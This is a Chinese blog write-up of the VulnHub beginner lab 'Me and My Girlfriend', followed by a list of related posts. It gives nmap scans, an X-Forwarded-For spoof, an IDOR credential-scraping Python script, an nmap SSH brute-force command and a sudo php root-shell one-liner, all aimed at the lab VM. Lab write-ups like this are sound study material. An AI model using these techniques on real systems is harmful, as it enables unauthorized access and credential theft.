[Vulnhub] Me and my girlfriend

最新推荐文章于 2023-01-15 03:14:07 发布
最新推荐文章于 2023-01-15 03:14:07 发布
阅读量422 收藏 3
点赞数 1
分类专栏: Vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/125465674
版权

目录

前言

信息收集

越权访问

ssh爆破

提权

前言

打算学习一下渗透测试,配合vulnhub来学习一下。

靶机下载链接:Me and My Girlfriend: 1 ~ VulnHub

描述:这个虚拟机告诉我们有一对恋人,爱丽丝和鲍勃,这对情侣原本很浪漫,但是自从爱丽丝在一家私人公司“Ceban Corp”工作后,爱丽丝对鲍勃的态度发生了变化。是“隐藏的”,Bob 请求您的帮助以获取 Alice 隐藏的内容并获得对公司的完全访问权限!

难度级别:初学者

注意:有2个flag file

学习:Web 应用程序 | 简单的权限提升

kali和靶机都设置为NAT模式,这样他们就在同一网段

然后打开kali和我们的靶机

信息收集

由于靶机和kali在同一网段,打开kali,通过nmap进行主机发现

kali:192.168.236.128

用nmap扫描网段

nmap -sn 192.168.236.0/24 或 nmap -sP 192.168.236.0/24

 靶机ip应该就是:192.168.236.130

扫一下端口

nmap -sV -n -open -p 192.168.236.130

 开放了22(ssh)和80(http)端口,应该是个网站服务器

访问192.168.236.130:80

 提示只可以本地访问,我们burp抓包修改X-Forwarded-For为127.0.0.1试试

 访问?page=index 使用x-forwarded-for插件更改为127.0.0.1 进入到网站页面

越权访问

 注册一个账号用于登录

用户名:lxy  密码:123456

在用户主页点击Profile,可以看到当前用户的账号密码-明文,url栏里有user_id=12参数

 更改id为其他,可以看见其他人账户信息

存在越权访问漏洞

id=1时

name=Eweuh Tandingan username=eweuhtandingan password=skuyatuh

在浏览器中,不可浏览的Password密码框,用F12审查元素将这个input标签的type从"password"改为"text",内容就可视了

ssh爆破

因为我们之前扫描端口,扫出来网站具有ssh服务

在这里收集每个用户的账号密码,分别存储为uname.txt和passwd.txt

import requests
import re

userpattern='<input .+? id="username" value="(.+?)"><br>'
passpattern='<input .+? id="password" value="(.+?)"><br>'
f1=open(r"C:\Users\lenovo\Desktop\username.txt","a")
f2=open(r"C:\Users\lenovo\Desktop\password.txt","a")

for id in range(1,30):
    burp0_url = "http://192.168.236.130:80/index.php?page=profile&user_id=%d" %id
    burp0_cookies = {"PHPSESSID": "l98mpqcp8e02nqvisetg8tjfa2"}
    burp0_headers = {"User-Agent": "127.0.0.1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "X-Forwarded-For": "127.0.0.1"}
    r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    username=''.join(re.findall(userpattern,r.text))
    password=''.join(re.findall(passpattern,r.text))
    if username or password:
        f1.write(username+"\n")
        f2.write(password+"\n")
    #print(username,password)
f1.close()
f2.close()

用nmap 进行ssh爆破

nmap -p 22 --script=ssh-brute --script-args userdb=uname.txt,passdb=passwd.txt 192.168.236.130

看其他师傅博客写的,不知道为什么没有爆破成功

没几个用户,那就挨个尝试吧,最终alice用户ssh登录成功

还有一个就是,题目给的是女朋友叫alice,所以连接alice 🙃🙃🙃 好扯

 连进去,查看隐藏文件,发现了.mysecret 进去查看一下,得到第一个flag

 并得到提示说:我们下一步需要获得root权限,读取下一个flag。

提权

sudo -l  查看alice用户权限 查看当前用户可执行的与无法执行的指令

告诉我们可以使用php,尝试用php提权

php提权姿势:PHP提权姿势_php提权

sudo php -r 'system("/bin/bash");'   php回调bash提权

在root目录下得到flag2。

葫芦娃42
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VulnHub--Me-and-My-Girlfriend-1
记录笔记
04-04 1289
背景 有两个恋人,即Alice和Bob,这对夫妻本来很浪漫,但是自从Alice在一家私人公司“Ceban Corp”工作以来,爱丽丝对鲍勃的态度发生了一些变化是“隐藏”的,而鲍勃(Bob)寻求您的帮助,以获取爱丽丝(Alice)隐藏的内容并获得对该公司的完全访问权限! 需求 Me-and-My-Girlfriend-1 虚拟机 Kali Linux 2021 复现 调一下kali 设置 root权限 这个是mygirlfrienf 的net 网段在192.168.227.0 Kali的网段也是在19
Vulnhub靶机渗透之Me and My Girlfriend
realmels的博客
06-28 2088
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell 介绍 Vulnhub它是一个提供各种漏洞环境的平台,官方链接:https://www.vuln.
Vulnhub之Me-and-My-Girlfriend
weixin_42075643的博客
04-07 232
Vulnhub是一个很好的靶机平台,想看官网点这里 今天学习Me-and-My-Girlfriend,点击这里下载哦~ VMware和VirtualBox都可以导入 成功后如图: 这里修改连接为NAT模式 然后就开始玩耍吧~~ 攻击机:kali 192.168.81.140 因此用nmap探测靶机ip: nmap -Pn -sS 192.168.81.0/24 下图,靶机ip为192.168.81.145(ps:144为我的另一台虚机) 继续直接探测ip信息: nmap -A 192.168.8
Vulnhub-Me and My Girlfriend: 1-Writeup
Vicl1fe的博客
12-18 943
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 靶机知识点: kali ip:192.168.34.80 靶机ip:192.168.34.152 信息收集 常规收集。 nmap -sV -p- 192.168.34.152 妥妥的...
Vulnhub】me-and-mygrilfriend_Writeup
4ut15m's blog
12-18 683
Vulnhub_Me-And-MyGirlFriend_WriteUP@4ut15m Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked...
靶机系列测试 Me and My Girlfriend 11
08-03
介绍2.1 靶机介绍描述说明there are 2 flag filesWeb Application | Enumeration | Privilege Es
Does GPT-4 Know Me Better Than My Girlfriend_.pdf
06-30
在探讨“GPT-4是否比我女朋友更了解我”这一话题时,我们触及了人工智能(AI)在理解和预测人类个性方面的能力。这个实验基于作者Dan Shipper的个人尝试,他利用GPT-4来模拟他的行为,并通过他在线上发表的内容和...
我的女友-my girlfriend.docx
02-17
我的女友-my girlfriend.docx
Robots-Stole-My-Girlfriend
07-02
可能与git clone git@github.com:MaTachi/Robots-Stole-My-Girlfriend.git 。 打开Eclipse。 将项目导入 Eclipse。 编译项目并运行它。地图编辑器地点可以在以下 URL 上找到地图编辑器: : 如何在 RSMG 中使用地图...
python-girlfriend-mood-master
12-07
个人使用
初试Vulnhub靶场之Me and My Girlfriend(上)
Mrs_H的博客
09-06 648
初试Vulnhub靶场之Me and My Girlfriend(上) 今天刚刚了解到一个靶场vulnhub,然后看了很多大佬的wp就想着自己写一个,刚刚好手头上有一个新下的靶机Me and My Girlfriend,稍稍把玩了一下,拿到了第一个flag,下面是我的方法 ...
靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
qq_57976347的博客
01-26 3881
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动 一、靶场环境搭建 Me-and-My-Girlfriend-1的靶机网络模式设置为NAT 接着启动该靶场虚拟机 二、在Kali上面的操作 1.用nmap命令探测靶机的IP 用 nmap -sV -n -open -p- 192.168.100.128 扫出靶机详细信息 2.登录靶机的..
vulnhub : Me and My Girlfriend
weixin_45112649的博客
01-15 290
练习+加深记忆固编写此文章。因为自身基础不够会在练习的过程中将不熟悉的东西查资料,并附在超链接中。
VulnHub—Me and My Girlfriend: 1
weixin_39219503的博客
12-22 614
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 题目信息如下,难度入门级,需要获取俩个flag Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the coupl...
Vulnhub靶场之Me-and-My-Girlfriend
weixin_51446936的博客
06-10 664
先看一下描述: 一、靶机搭建 1. 靶机下载 下载地址:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2. 靶机导入 第一步:导入(打开虚拟机–>选择下载的靶机–>选择存储路径–>导入) 注:会报导入失败的错误,点击重试即可。 第二步:导入后,删除网卡并重新添加(NAT网卡) 第三步:启动虚拟机 二、信息收集 1. nmap扫描确定靶机ip nmap -sS -Pn 192.168.
vulnhub之Me-and-My-Girlfriend-1
底层社会中的弱智
01-03 650
像之前的套路一样,nmap真香 找到了目标主机,IP为172.16.12.15 进行端口侦测: 22号端口是ssh服务(弱口令登录,爆破,一些攻击载荷) 80号端口中间件是apache的2.4.7(常规的网站漏洞扫面) 先打开网页看看: 注意提示信息很重要!意思就是让我们抓包改包,把x-forwarded-for这个参数的值改为本地(localhost) 启动bp来尝试: ...
Vulnhub靶机 Me-and-My-Girlfriend
weixin_46107179的博客
03-09 114
Vulnhub靶机 Me-and-My-Girlfriend
Vulnhub靶机:ME AND MY GIRLFRIEND_ 1
LainWith的博客
01-29 1672
目录介绍信息收集主机发现主机信息探测网站探测sql注入-失败水平越权-成功获取到所有账号密码SSH爆破SSH登录Flag1提权拿到Flag2方法1:php命令执行方法2:php反弹shell参考 介绍 系列:Me and My Girlfriend(此系列仅此一台) 发布日期: 2019年12月13日 难度: 初级 Flag : 2个 学习:BurpSuite在水平越权中的应用、SUID提权 靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,
Vulnhub Me-and-My-Girlfriend 1靶机思路分析
Sum
06-13 1689
Vulnhub Me-and-My-Girlfriend 1靶机思路分析 背景描述:有一对恋人,即Alice和Bob,这对夫妻本来很浪漫,但是自从Alice在一家私人公司“ Ceban Corp”工作以来,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,而鲍勃(Bob)寻求您的帮助,以获取爱丽丝(Alice)隐藏的内容并获得对该公司的完全访问权限! Me-and-My-Girlfriend: 下载地址: https : //download.vulnhub.com 环境: Vmware 15 Pro虚拟机软件
I cry whenever I have an argument with my girlfriend, can you give me some advice?
最新发布
09-16
### 回答1: 我建议你和你女友多沟通,尽量用理性的话语让彼此能够理解对方,这样可以减少争吵。同时,你也可以尝试去做一些让你感到开心的事情,比如做运动、聆听音乐、看电影等等,让自己释放压力,有助于你更好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值